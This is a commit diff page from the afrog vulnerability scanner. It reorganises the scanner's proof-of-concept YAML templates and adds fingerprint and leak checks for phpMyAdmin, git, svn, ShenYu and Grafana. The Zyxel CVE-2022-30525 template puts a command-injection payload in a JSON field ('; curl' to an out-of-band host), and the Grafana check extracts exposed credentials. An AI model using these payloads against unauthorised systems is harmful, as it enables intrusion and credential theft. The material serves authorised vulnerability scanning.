crash.software
Projects
Pull Requests
Issues
Builds
afrog
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY afrog Commits 959cd336
🤬
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/CVE/2022/CVE-2022-30525.yaml
    1  -id: CVE-2022-30525
    2  - 
    3  -info:
    4  - name: Zyxel Firewall - OS Command Injection
    5  - author: h1ei1,prajiteshsingh
    6  - severity: critical
    7  - description: |
    8  - An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
    9  - reference:
    10  - - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
    11  - - https://github.com/rapid7/metasploit-framework/pull/16563
    12  - - https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml
    13  - - https://nvd.nist.gov/vuln/detail/CVE-2022-30525
    14  - - http://wiki.peiqi.tech/wiki/iot/Zyxel/Zyxel%20USG%20FLEX%20handler%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2022-30525.html
    15  - 
    16  -set:
    17  - reverse: newReverse()
    18  - reverseURL: reverse.url
    19  -rules:
    20  - r0:
    21  - request:
    22  - method: POST
    23  - path: /ztp/cgi-bin/handler
    24  - headers:
    25  - Content-Type: application/json
    26  - body: |
    27  - {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{reverseURL}};","data":"hi"}
    28  - expression: response.status == 500 && reverse.wait(5)
    29  -expression: r0()
  • ■ ■ ■ ■ ■ ■
    afrog-pocs/fingerprint/phpmyadmin-panel.yaml
    1  -id: phpmyadmin-panel
    2  - 
    3  -info:
    4  - name: phpMyAdmin Panel
    5  - author: pdteam
    6  - severity: info
    7  - 
    8  -rules:
    9  - r0:
    10  - request:
    11  - method: GET
    12  - path: /phpmyadmin/
    13  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    14  - r1:
    15  - request:
    16  - method: GET
    17  - path: /phpMyAdmin/
    18  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    19  - r2:
    20  - request:
    21  - method: GET
    22  - path: /xampp/phpmyadmin/
    23  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    24  - r3:
    25  - request:
    26  - method: GET
    27  - path: /web/phpmyadmin/
    28  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    29  - r4:
    30  - request:
    31  - method: GET
    32  - path: /typo3/phpmyadmin/
    33  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    34  - r5:
    35  - request:
    36  - method: GET
    37  - path: /forum/phpmyadmin/
    38  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    39  - r6:
    40  - request:
    41  - method: GET
    42  - path: /php/phpmyadmin/
    43  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    44  - r7:
    45  - request:
    46  - method: GET
    47  - path: /phpmyadmin/
    48  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    49  - r8:
    50  - request:
    51  - method: GET
    52  - path: /blog/phpmyadmin/
    53  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body
    54  - r9:
    55  - request:
    56  - method: GET
    57  - path: /apache-default/phpmyadmin/
    58  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    59  - r10:
    60  - request:
    61  - method: GET
    62  - path: /administrator/components/com_joommyadmin/phpmyadmin/
    63  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    64  - r11:
    65  - request:
    66  - method: GET
    67  - path: /_phpmyadmin/
    68  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    69  - r12:
    70  - request:
    71  - method: GET
    72  - path: /admin//phpmyadmin/
    73  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    74  -expression: r0() || r1() || r2() || r3() || r4() || r5() || r6() || r7() || r8() || r9() | r10() || r11() || r12()
  • ■ ■ ■ ■ ■ ■
    cmd/rules/main.go
    skipped 7 lines
    8 8  )
    9 9   
    10 10  func main() {
    11  - c := catalog.New("./afrog-pocs")
    12  - allPocsYamlSlice, err := c.GetPocPath("./afrog-pocs")
     11 + c := catalog.New("./pocs/afrog-pocs")
     12 + allPocsYamlSlice, err := c.GetPocPath("./pocs/afrog-pocs")
    13 13   if err != nil && len(allPocsYamlSlice) == 0 {
    14 14   fmt.Println("未找到可执行脚本(POC),请检查`默认脚本`或指定新の脚本(POC)")
    15 15   }
    skipped 11 lines
  • ■ ■ ■ ■
    internal/runner/banner.go
    skipped 8 lines
    9 9  )
    10 10   
    11 11  func ShowBanner() string {
    12  - return log.LogColor.Bold("afrog ") + log.LogColor.Banner(".")
     12 + return log.LogColor.Bold("afrog ") + log.LogColor.Banner("")
    13 13  }
    14 14   
    15 15  func ShowUsage() string {
    skipped 17 lines
  • afrog-pocs/fingerprint/appex-lotwan-login-panel.yaml pocs/afrog-pocs/a-fingerprinting/appex-lotwan-login-panel.yaml
    Content is identical
  • ■ ■ ■ ■ ■ ■
    pocs/afrog-pocs/a-fingerprinting/phpmyadmin-panel.yaml
    skipped 9 lines
    10 10   request:
    11 11   method: GET
    12 12   path: /phpmyadmin/
    13  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && "v=([a-z0-9-._]+)".bmatches(response.body)
    14  -expression: r0()
     13 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     14 + r1:
     15 + request:
     16 + method: GET
     17 + path: /phpMyAdmin/
     18 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     19 + r2:
     20 + request:
     21 + method: GET
     22 + path: /xampp/phpmyadmin/
     23 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     24 + r3:
     25 + request:
     26 + method: GET
     27 + path: /web/phpmyadmin/
     28 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     29 + r4:
     30 + request:
     31 + method: GET
     32 + path: /typo3/phpmyadmin/
     33 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     34 + r5:
     35 + request:
     36 + method: GET
     37 + path: /forum/phpmyadmin/
     38 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     39 + r6:
     40 + request:
     41 + method: GET
     42 + path: /php/phpmyadmin/
     43 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     44 + r7:
     45 + request:
     46 + method: GET
     47 + path: /phpmyadmin/
     48 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     49 + r8:
     50 + request:
     51 + method: GET
     52 + path: /blog/phpmyadmin/
     53 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body
     54 + r9:
     55 + request:
     56 + method: GET
     57 + path: /apache-default/phpmyadmin/
     58 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     59 + r10:
     60 + request:
     61 + method: GET
     62 + path: /administrator/components/com_joommyadmin/phpmyadmin/
     63 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     64 + r11:
     65 + request:
     66 + method: GET
     67 + path: /_phpmyadmin/
     68 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     69 + r12:
     70 + request:
     71 + method: GET
     72 + path: /admin/phpmyadmin/
     73 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     74 +expression: r0() || r1() || r2() || r3() || r4() || r5() || r6() || r7() || r8() || r9() | r10() || r11() || r12()
  • afrog-pocs/disclosure/hue-login-panel.yaml pocs/afrog-pocs/b-disclosure/hue-login-panel.yaml
    Content is identical
  • afrog-pocs/vulnerability/acti-video-read-file.yaml pocs/afrog-pocs/e-vulnerability/acti-video-read-file.yaml
    Content is identical
  • afrog-pocs/vulnerability/alibaba-canal-config-leak.yaml pocs/afrog-pocs/e-vulnerability/alibaba-canal-config-leak.yaml
    Content is identical
  • afrog-pocs/vulnerability/bohuangwanglong-cmd-php-rce.yaml pocs/afrog-pocs/e-vulnerability/bohuangwanglong-cmd-php-rce.yaml
    Content is identical
  • afrog-pocs/vulnerability/bohuawanglong-users-xml-password-leak.yaml pocs/afrog-pocs/e-vulnerability/bohuawanglong-users-xml-password-leak.yaml
    Content is identical
  • afrog-pocs/vulnerability/byzoro-smart-importhtml-rce.yaml pocs/afrog-pocs/e-vulnerability/byzoro-smart-importhtml-rce.yaml
    Content is identical
  • afrog-pocs/vulnerability/clickhouse-api-unauth.yaml pocs/afrog-pocs/e-vulnerability/clickhouse-api-unauth.yaml
    Content is identical
  • afrog-pocs/vulnerability/docker-remote-api-unauth.yaml pocs/afrog-pocs/e-vulnerability/docker-remote-api-unauth.yaml
    Content is identical
  • afrog-pocs/vulnerability/e-office-v10-sql-inject.yaml pocs/afrog-pocs/e-vulnerability/e-office-v10-sql-inject.yaml
    Content is identical
  • afrog-pocs/vulnerability/eyou-mail-moni-detail-rce.yaml pocs/afrog-pocs/e-vulnerability/eyou-mail-moni-detail-rce.yaml
    Content is identical
  • afrog-pocs/vulnerability/feiyuxing-info-leak.yaml pocs/afrog-pocs/e-vulnerability/feiyuxing-info-leak.yaml
    Content is identical
  • afrog-pocs/vulnerability/flix-ax8-download-read-file.yaml pocs/afrog-pocs/e-vulnerability/flix-ax8-download-read-file.yaml
    Content is identical
  • ■ ■ ■ ■ ■ ■
    pocs/afrog-pocs/e-vulnerability/git-leak.yaml
     1 +id: git-leak
     2 + 
     3 +info:
     4 + name: Git 代码托管泄漏
     5 + author: zan8in
     6 + severity: critical
     7 + 
     8 +rules:
     9 + r0:
     10 + request:
     11 + method: GET
     12 + path: /.git/config
     13 + expression: response.status == 200 && response.body.bcontains(b'[core]') && response.body.bcontains(b'repositoryformatversion') && response.body.bcontains(b'[branch')
     14 + r1:
     15 + request:
     16 + method: GET
     17 + path: /.git/index
     18 + expression: response.status == 200 && response.body.bcontains(b'BIRC') && response.body.bcontains(b'repositoryformatversion') && response.body.bcontains(b'[branch')
     19 +
     20 + r2:
     21 + request:
     22 + method: GET
     23 + path: /.git/HEAD
     24 + expression: response.status == 200 && response.body.bcontains(b'refs/heads') && response.body.bcontains(b'repositoryformatversion') && response.body.bcontains(b'[branch')
     25 +expression: r0() || r1() || r2()
  • afrog-pocs/vulnerability/h3c-mpsec-isg1000-file-read.yaml pocs/afrog-pocs/e-vulnerability/h3c-mpsec-isg1000-file-read.yaml
    Content is identical
  • afrog-pocs/vulnerability/haofeng-firewall-setdomain-unauth.yaml pocs/afrog-pocs/e-vulnerability/haofeng-firewall-setdomain-unauth.yaml
    Content is identical
  • afrog-pocs/vulnerability/hikvision-gateway-data-file-read.yaml pocs/afrog-pocs/e-vulnerability/hikvision-gateway-data-file-read.yaml
    Content is identical
  • afrog-pocs/vulnerability/hikvision-showfile-file-read.yaml pocs/afrog-pocs/e-vulnerability/hikvision-showfile-file-read.yaml
    Content is identical
  • afrog-pocs/vulnerability/huiwen-book-config-properties-info-leak.yaml pocs/afrog-pocs/e-vulnerability/huiwen-book-config-properties-info-leak.yaml
    Content is identical
  • afrog-pocs/vulnerability/ikuai-login-panel.yaml pocs/afrog-pocs/e-vulnerability/ikuai-login-panel.yaml
    Content is identical
  • afrog-pocs/vulnerability/kedacom-gateway-file-read.yaml pocs/afrog-pocs/e-vulnerability/kedacom-gateway-file-read.yaml
    Content is identical
  • afrog-pocs/vulnerability/kedacom-mts-file-read.yaml pocs/afrog-pocs/e-vulnerability/kedacom-mts-file-read.yaml
    Content is identical
  • afrog-pocs/vulnerability/kingsoft-v8-get-file-content-file-read.yaml pocs/afrog-pocs/e-vulnerability/kingsoft-v8-get-file-content-file-read.yaml
    Content is identical
  • afrog-pocs/vulnerability/kyan-network-license-php-rce.yaml pocs/afrog-pocs/e-vulnerability/kyan-network-license-php-rce.yaml
    Content is identical
  • afrog-pocs/vulnerability/kyan-network-module-php-rce.yaml pocs/afrog-pocs/e-vulnerability/kyan-network-module-php-rce.yaml
    Content is identical
  • afrog-pocs/vulnerability/kyan-network-time-php-rce.yaml pocs/afrog-pocs/e-vulnerability/kyan-network-time-php-rce.yaml
    Content is identical
  • afrog-pocs/vulnerability/magicflow-main-xp-file-read.yaml pocs/afrog-pocs/e-vulnerability/magicflow-main-xp-file-read.yaml
    Content is identical
  • afrog-pocs/vulnerability/msa-gateway-read-file.yaml pocs/afrog-pocs/e-vulnerability/msa-gateway-read-file.yaml
    Content is identical
  • afrog-pocs/vulnerability/netmizer-log-management-cmd-php-rce.yaml pocs/afrog-pocs/e-vulnerability/netmizer-log-management-cmd-php-rce.yaml
    Content is identical
  • afrog-pocs/vulnerability/netmizer-log-management-data-directory-traversal.yaml pocs/afrog-pocs/e-vulnerability/netmizer-log-management-data-directory-traversal.yaml
    Content is identical
  • afrog-pocs/vulnerability/netpower-download-php-file-read.yaml pocs/afrog-pocs/e-vulnerability/netpower-download-php-file-read.yaml
    Content is identical
  • afrog-pocs/vulnerability/php-zerodium-backdoor.yaml pocs/afrog-pocs/e-vulnerability/php-zerodium-backdoor.yaml
    Content is identical
  • afrog-pocs/vulnerability/phpmyadmin-misconfiguration.yaml pocs/afrog-pocs/e-vulnerability/phpmyadmin-misconfiguration.yaml
    Content is identical
  • afrog-pocs/vulnerability/phpmyadmin-server-import.yaml pocs/afrog-pocs/e-vulnerability/phpmyadmin-server-import.yaml
    Content is identical
  • afrog-pocs/vulnerability/phpmyadmin-setup.yaml pocs/afrog-pocs/e-vulnerability/phpmyadmin-setup.yaml
    Content is identical
  • afrog-pocs/vulnerability/sapido-router-rce.yaml pocs/afrog-pocs/e-vulnerability/sapido-router-rce.yaml
    Content is identical
  • afrog-pocs/vulnerability/selea-targa-camera-read-file.yaml pocs/afrog-pocs/e-vulnerability/selea-targa-camera-read-file.yaml
    Content is identical
  • ■ ■ ■ ■ ■ ■
    pocs/afrog-pocs/e-vulnerability/svn-leak.yaml
     1 +id: svn-leak
     2 + 
     3 +info:
     4 + name: SVM 代码托管泄漏
     5 + author: zan8in
     6 + severity: critical
     7 + 
     8 +rules:
     9 + r0:
     10 + request:
     11 + method: GET
     12 + path: /.svn/entries
     13 + expression: response.status == 200 && response.body.bcontains(b'-props') && response.body.bcontains(b'svn://')
     14 +expression: r0()
  • afrog-pocs/vulnerability/tenda-w15e-routercfm-cfg-config-leak.yaml pocs/afrog-pocs/e-vulnerability/tenda-w15e-routercfm-cfg-config-leak.yaml
    Content is identical
  • afrog-pocs/vulnerability/wholeton-vpn-info-leak.yaml pocs/afrog-pocs/e-vulnerability/wholeton-vpn-info-leak.yaml
    Content is identical
  • afrog-pocs/vulnerability/wisegiga-nas-down-data-php-file-read.yaml pocs/afrog-pocs/e-vulnerability/wisegiga-nas-down-data-php-file-read.yaml
    Content is identical
  • afrog-pocs/vulnerability/wisegiga-nas-group-php-rce.yaml pocs/afrog-pocs/e-vulnerability/wisegiga-nas-group-php-rce.yaml
    Content is identical
  • afrog-pocs/CNVD/2020/CNVD-2020-62853.yaml pocs/afrog-pocs/f-CNVD/2020/CNVD-2020-62853.yaml
    Content is identical
  • afrog-pocs/CNVD/2020/CNVD-2020-73282.yaml pocs/afrog-pocs/f-CNVD/2020/CNVD-2020-73282.yaml
    Content is identical
  • afrog-pocs/CNVD/2021/CNVD-2021-32799.yaml pocs/afrog-pocs/f-CNVD/2021/CNVD-2021-32799.yaml
    Content is identical
  • afrog-pocs/CNVD/2021/CNVD-2021-39067.yaml pocs/afrog-pocs/f-CNVD/2021/CNVD-2021-39067.yaml
    Content is identical
  • afrog-pocs/CVE/2007/CVE-2007-4556.yaml pocs/afrog-pocs/g-CVE/2007/CVE-2007-4556.yaml
    Content is identical
  • afrog-pocs/CVE/2012/CVE-2012-0392.yaml pocs/afrog-pocs/g-CVE/2012/CVE-2012-0392.yaml
    Content is identical
  • afrog-pocs/CVE/2013/CVE-2013-1965.yaml pocs/afrog-pocs/g-CVE/2013/CVE-2013-1965.yaml
    Content is identical
  • afrog-pocs/CVE/2017/CVE-2017-12611.yaml pocs/afrog-pocs/g-CVE/2017/CVE-2017-12611.yaml
    Content is identical
  • afrog-pocs/CVE/2017/CVE-2017-16894.yaml pocs/afrog-pocs/g-CVE/2017/CVE-2017-16894.yaml
    Content is identical
  • afrog-pocs/CVE/2017/CVE-2017-5638.yaml pocs/afrog-pocs/g-CVE/2017/CVE-2017-5638.yaml
    Content is identical
  • afrog-pocs/CVE/2017/CVE-2017-8229.yaml pocs/afrog-pocs/g-CVE/2017/CVE-2017-8229.yaml
    Content is identical
  • afrog-pocs/CVE/2018/CVE-2018-11776.yaml pocs/afrog-pocs/g-CVE/2018/CVE-2018-11776.yaml
    Content is identical
  • afrog-pocs/CVE/2018/CVE-2018-1273.yaml pocs/afrog-pocs/g-CVE/2018/CVE-2018-1273.yaml
    Content is identical
  • afrog-pocs/CVE/2018/CVE-2018-8715.yaml pocs/afrog-pocs/g-CVE/2018/CVE-2018-8715.yaml
    Content is identical
  • afrog-pocs/CVE/2019/CVE-2019-0230.yaml pocs/afrog-pocs/g-CVE/2019/CVE-2019-0230.yaml
    Content is identical
  • afrog-pocs/CVE/2019/CVE-2019-5418.yaml pocs/afrog-pocs/g-CVE/2019/CVE-2019-5418.yaml
    Content is identical
  • afrog-pocs/CVE/2020/CVE-2020-11738.yaml pocs/afrog-pocs/g-CVE/2020/CVE-2020-11738.yaml
    Content is identical
  • afrog-pocs/CVE/2020/CVE-2020-11991.yaml pocs/afrog-pocs/g-CVE/2020/CVE-2020-11991.yaml
    Content is identical
  • afrog-pocs/CVE/2020/CVE-2020-17530.yaml pocs/afrog-pocs/g-CVE/2020/CVE-2020-17530.yaml
    Content is identical
  • afrog-pocs/CVE/2021/CVE-2021-1497.yaml pocs/afrog-pocs/g-CVE/2021/CVE-2021-1497.yaml
    Content is identical
  • afrog-pocs/CVE/2021/CVE-2021-1499.yaml pocs/afrog-pocs/g-CVE/2021/CVE-2021-1499.yaml
    Content is identical
  • afrog-pocs/CVE/2021/CVE-2021-22145.yaml pocs/afrog-pocs/g-CVE/2021/CVE-2021-22145.yaml
    Content is identical
  • afrog-pocs/CVE/2021/CVE-2021-30461.yaml pocs/afrog-pocs/g-CVE/2021/CVE-2021-30461.yaml
    Content is identical
  • afrog-pocs/CVE/2021/CVE-2021-3297.yaml pocs/afrog-pocs/g-CVE/2021/CVE-2021-3297.yaml
    Content is identical
  • afrog-pocs/CVE/2021/CVE-2021-41381.yaml pocs/afrog-pocs/g-CVE/2021/CVE-2021-41381.yaml
    Content is identical
  • afrog-pocs/CVE/2021/CVE-2021-42013.yaml pocs/afrog-pocs/g-CVE/2021/CVE-2021-42013.yaml
    Content is identical
  • afrog-pocs/CVE/2022/CVE-2022-22965.yaml pocs/afrog-pocs/g-CVE/2022/CVE-2022-22965.yaml
    Content is identical
  • ■ ■ ■ ■ ■ ■
    pocs/afrog-pocs/g-CVE/2022/CVE-2022-23944.yaml
     1 +id: CVE-2022-23944
     2 + 
     3 +info:
     4 + name: Apache ShenYu Admin Unauth Access
     5 + author: cckuakilong
     6 + severity: critical
     7 + description: Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.
     8 + reference:
     9 + - https://github.com/apache/incubator-shenyu/pull/2462
     10 + - https://nvd.nist.gov/vuln/detail/CVE-2022-23944
     11 + - https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md
     12 + - https://lists.apache.org/thread/dbrjnnlrf80dr0f92k5r2ysfvf1kr67y
     13 + 
     14 +rules:
     15 + r0:
     16 + request:
     17 + method: GET
     18 + path: /plugin
     19 + expression: response.status == 200 && response.body.bcontains(b'"message":"query success"') && response.body.bcontains(b'"code":200')
     20 +expression: r0()
  • ■ ■ ■ ■ ■ ■
    pocs/afrog-pocs/g-CVE/2022/CVE-2022-26148.yaml
     1 +id: CVE-2022-26148
     2 + 
     3 +info:
     4 + name: Grafana & Zabbix Integration - Credentials Disclosure
     5 + author: Geekby
     6 + severity: critical
     7 + description: |
     8 + Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address.
     9 + reference:
     10 + - https://2k8.org/post-319.html
     11 + - https://security.netapp.com/advisory/ntap-20220425-0005/
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2022-26148
     13 + 
     14 +rules:
     15 + r0:
     16 + request:
     17 + method: GET
     18 + path: /login?redirect=%2F
     19 + expression: response.status == 200 && (response.body.bcontains(b'"zabbix":') || response.body.bcontains(b'"zbx":') || response.body.bcontains(b'alexanderzobnin-zabbix-datasource')) && '"password":"(.*?)"'.bmatches(response.body) && '"username":"(.*?)"'.bmatches(response.body)
     20 +expression: r0()
  • ■ ■ ■ ■ ■ ■
    pocs/afrog-pocs/g-CVE/2022/CVE-2022-30525.yaml
    skipped 1 lines
    2 2   
    3 3  info:
    4 4   name: Zyxel Firewall - OS Command Injection
    5  - author: zan8in
     5 + author: h1ei1,prajiteshsingh
    6 6   severity: critical
    7 7   description: |
    8  - Rapid7 发现并报告了一个漏洞,该漏洞影响支持零接触配置 (ZTP) 的 Zyxel 防火墙,其中包括 ATP 系列、VPN 系列和 USG FLEX 系列(包括 USG20-VPN 和 USG20W-VPN)。该漏洞标识为 CVE-2022-30525,允许未经身份验证的远程攻击者以nobody受影响设备上的用户身份执行任意代码。
    9  - title="USG FLEX"
     8 + An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
    10 9   reference:
     10 + - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
     11 + - https://github.com/rapid7/metasploit-framework/pull/16563
     12 + - https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2022-30525
    11 14   - http://wiki.peiqi.tech/wiki/iot/Zyxel/Zyxel%20USG%20FLEX%20handler%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2022-30525.html
    12 15   
    13 16  set:
    skipped 6 lines
    20 23   path: /ztp/cgi-bin/handler
    21 24   headers:
    22 25   Content-Type: application/json
    23  - body: "{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\":\"1\",\"vlanid\":\"5\",\"mtu\":\"; curl {{reverseURL}};\",\"data\":\"hi\"}"
    24  - expression: reverse.wait(5)
     26 + body: |
     27 + {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{reverseURL}};","data":"hi"}
     28 + expression: response.status == 500 && reverse.wait(5)
    25 29  expression: r0()
    26  - 
Please wait...
Page is in error, reload to recover